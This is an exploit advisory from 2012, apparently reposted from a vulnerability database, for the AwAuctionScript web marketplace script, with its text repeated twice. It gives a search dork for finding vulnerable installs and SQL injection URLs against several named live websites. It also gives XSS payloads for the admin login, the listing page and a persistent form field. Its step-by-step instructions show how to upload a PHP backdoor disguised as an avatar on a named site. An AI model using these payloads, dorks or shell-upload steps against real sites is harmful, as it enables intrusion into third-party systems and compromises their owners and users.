AwAuctionScript (Aw Auction Script - Market Place for WebMasters) Multiple Vulnerabilities

2012-11-06T00:00:00
ID SECURITYVULNS:DOC:28740
Type securityvulns
Reporter Securityvulns
Modified 2012-11-06T00:00:00

Description

========================================================================================== AwAuctionScript (Aw Auction Script - Market Place for WebMasters) Multiple Vulnerabilities ==========================================================================================

:----------------------------------------------------------------------------------------------------------------------------------------: : # Exploit Title : AwAuctionScript (Aw Auction Script - Market Place for WebMasters) Multiple Vulnerabilities : # Date : 04 November 2012 : # Author : X-Cisadane : # Download : http://www.awauctionscript.com OR Googling it with this Keyword : AwAuctionScript - Market Place for WebMasters : # Version : ALL : # Category : Web Applications : # Vulnerability : SQL Injection Vulnerability, Upload Shell/Backdoor Vulnerability, XSS/HTML Injection Vulnerability : # Tested On : Mozilla Firefox 16.0.2 (Windows XP SP 3 32-Bit English) : # Greetz to : X-Code, Borneo Crew, Depok Cyber, Explore Crew, CodeNesia, Bogor-H, Jakarta Anonymous Club, Jabar Cyber, Winda Utari :----------------------------------------------------------------------------------------------------------------------------------------: DORKS ===== inurl:/listing.php?category=Website

Proof of Concept

SQL Injection : http://victim site/<path>/listing.php?category=Website&PageNo=[-SQL] 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-12,6' at line 1

Example : http://www.domaingang.net/listing.php?category=Website&PageNo=-1 http://www.wmmediacorp.com/sellyoursite/listing.php?category=Website&PageNo=-1 http://buyandsellwebsite.org/listing.php?category=Website&PageNo=-1 http://www.santinet.net/offers/listing.php?category=Website&PageNo=-1 http://nomclub.com/listing.php?category=Website&PageNo=-1 http://websiterama.com/listing.php?category=Website&PageNo=-1 http://www.flipitmarketplace.com/listing.php?category=Website&PageNo=-1

XSS (Non Persistent) - On the Admin Login page (Tested on Firefox) Fill username with : "><script>alert(/xss/)</script> and the password with anything.

Example : http://buyandsellwebsite.org/admin/ PIC : http://i50.tinypic.com/i20own.png

  • On Listing Page (Tested on Firefox) http://victim site/<path>/listing.php?category=[Insert HTML/XSS Script]

Example : http://buyandsellwebsite.org/listing.php?category=<script>alert(/x-cisadane/)</script> PIC : http://i46.tinypic.com/dwqip0.png

XSS (Persistent) *Must be logged in http://victim site/<path>/sell-your-site.php

Example (Victim/Target) : http://www.flipitmarketplace.com/sell-your-site.php - Go to http://www.flipitmarketplace.com/sell-your-site.php - On the Site Name, fill it with this script : <script>alert("Hacked)</script> - On the Site Description, fill it with this script on from this link http://pastebin.com/5mfg7xv4

PIC : http://i49.tinypic.com/20qz0x1.png

Upload Shell/Backdoor : Example (Victim/Target) : http://websiterama.com/ - Prepare your .php backdoor, rename it with index.php3 - Register to victim site, for example : http://websiterama.com/ - Activate by E-Mail, after Activated login to http://websiterama.com/login.php - Go to http://websiterama.com/edit-account.php - Upload the avatar, browse your Backdoor/Shell file & upload it! - Copy the image location/image url of the thumbnail (on the right) - Paste in URL. Voilaaaa! http://websiterama.com/avatar/1031115958.php3

Sent from my BlackBerry® smartphone from Sinyal Bagus XL, Nyambung Teruuusss...!

awauction.txt

========================================================================================== AwAuctionScript (Aw Auction Script - Market Place for WebMasters) Multiple Vulnerabilities ==========================================================================================

:----------------------------------------------------------------------------------------------------------------------------------------: : # Exploit Title : AwAuctionScript (Aw Auction Script - Market Place for WebMasters) Multiple Vulnerabilities : # Date : 04 November 2012 : # Author : X-Cisadane : # Download : http://www.awauctionscript.com OR Googling it with this Keyword : AwAuctionScript - Market Place for WebMasters : # Version : ALL : # Category : Web Applications : # Vulnerability : SQL Injection Vulnerability, Upload Shell/Backdoor Vulnerability, XSS/HTML Injection Vulnerability : # Tested On : Mozilla Firefox 16.0.2 (Windows XP SP 3 32-Bit English) : # Greetz to : X-Code, Borneo Crew, Depok Cyber, Explore Crew, CodeNesia, Bogor-H, Jakarta Anonymous Club, Jabar Cyber, Winda Utari :----------------------------------------------------------------------------------------------------------------------------------------: DORKS ===== inurl:/listing.php?category=Website

Proof of Concept

SQL Injection : http://victim site/<path>/listing.php?category=Website&PageNo=[-SQL] 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-12,6' at line 1

Example : http://www.domaingang.net/listing.php?category=Website&PageNo=-1 http://www.wmmediacorp.com/sellyoursite/listing.php?category=Website&PageNo=-1 http://buyandsellwebsite.org/listing.php?category=Website&PageNo=-1 http://www.santinet.net/offers/listing.php?category=Website&PageNo=-1 http://nomclub.com/listing.php?category=Website&PageNo=-1 http://websiterama.com/listing.php?category=Website&PageNo=-1 http://www.flipitmarketplace.com/listing.php?category=Website&PageNo=-1

XSS (Non Persistent) - On the Admin Login page (Tested on Firefox) Fill username with : "><script>alert(/xss/)</script> and the password with anything.

Example : http://buyandsellwebsite.org/admin/ PIC : http://i50.tinypic.com/i20own.png

  • On Listing Page (Tested on Firefox) http://victim site/<path>/listing.php?category=[Insert HTML/XSS Script]

Example : http://buyandsellwebsite.org/listing.php?category=<script>alert(/x-cisadane/)</script> PIC : http://i46.tinypic.com/dwqip0.png

XSS (Persistent) *Must be logged in http://victim site/<path>/sell-your-site.php

Example (Victim/Target) : http://www.flipitmarketplace.com/sell-your-site.php - Go to http://www.flipitmarketplace.com/sell-your-site.php - On the Site Name, fill it with this script : <script>alert("Hacked)</script> - On the Site Description, fill it with this script on from this link http://pastebin.com/5mfg7xv4

PIC : http://i49.tinypic.com/20qz0x1.png

Upload Shell/Backdoor : Example (Victim/Target) : http://websiterama.com/ - Prepare your .php backdoor, rename it with index.php3 - Register to victim site, for example : http://websiterama.com/ - Activate by E-Mail, after Activated login to http://websiterama.com/login.php - Go to http://websiterama.com/edit-account.php - Upload the avatar, browse your Backdoor/Shell file & upload it! - Copy the image location/image url of the thumbnail (on the right) - Paste in URL. Voilaaaa! http://websiterama.com/avatar/1031115958.php3